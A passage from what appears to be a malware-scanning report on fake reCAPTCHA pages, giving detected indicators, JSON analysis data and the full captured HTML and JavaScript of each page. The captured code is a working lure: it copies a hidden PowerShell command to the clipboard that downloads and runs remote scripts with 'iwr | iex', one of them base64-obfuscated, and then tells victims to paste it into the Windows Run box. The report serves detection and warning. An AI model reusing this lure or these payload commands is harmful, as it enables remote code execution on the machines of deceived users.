verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification Hash: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = \"-w hidden -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\";\n const commandToRun = \"powershell \" + htaPath;\n stageClipboard(commandToRun, verification_id);\n\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://jessespridecharters.com/v/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://jessespridecharters.com/v/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://yogasitesdev.wpengine.com/2/15.ps1"
],
"PowerShellCommands": "powershell \" + htaPath;",
"ClipboardCommands": "powershell ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...d; const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...idden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "'https://yogasitesdev.wpengine.com/2/15.ps1'",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" +..."
}
],
"CaptchaElements": [
"ication Hash: <span id=\"verification-id\">1110</span>\"",
"s=\"modal\"> <div class=\"modal-content\"> <p>Please",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"ent)) { document.getElementById(\"mobileWarningModal\").style.display = \"b",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> document.addEve",
"}); </script> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n\n.modal {\n display: none; /* Hidden by default */\n position: fixed;\n z-index: 9999; /* Ensure the modal is on top */\n left: 0;\n top: 0;\n width: 100%;\n height: 100%;\n background-color: rgba(0, 0, 0, 0.7); /* Dim the background */\n}\n\n.modal-content {\n position: absolute;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n background-color: white;\n padding: 20px;\n border-radius: 5px;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n text-align: center;\n font-family: Arial, sans-serif;\n}\n\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n z-index: 1000;\n}\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n opacity: 0; /* Initially hidden */\n visibility: hidden;\n z-index: 1001;\n}\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n<div id=\"mobileWarningModal\" class=\"modal\">\n <div class=\"modal-content\">\n <p>Please visit this site on a computer for the best experience.</p>\n </div>\n</div>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n To better prove you are not a robot, please:\n </p>\n <ol>\n <li>\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\n </li>\n \n <li>\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\n </li>\n\n <li>\n Press <b>Enter</b> on your keyboard to finish.\n </li>\n </ol>\n <p>\n You will observe and agree:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification Hash: <span id=\"verification-id\">1110</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n Perform the steps above to finish verification.\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\n </footer>\n </div> \n </div>\n<script>\n document.addEventListener(\"DOMContentLoaded\", function () {\n if (/Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent)) {\n document.getElementById(\"mobileWarningModal\").style.display = \"block\";\n document.body.style.overflow = \"hidden\"; // Prevent scrolling\n }\n });\n</script>\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification Hash: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\";\n const commandToRun = \"powershell \" + htaPath;\n stageClipboard(commandToRun, verification_id);\n\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://mail.lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://mail.lucprofessional.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h 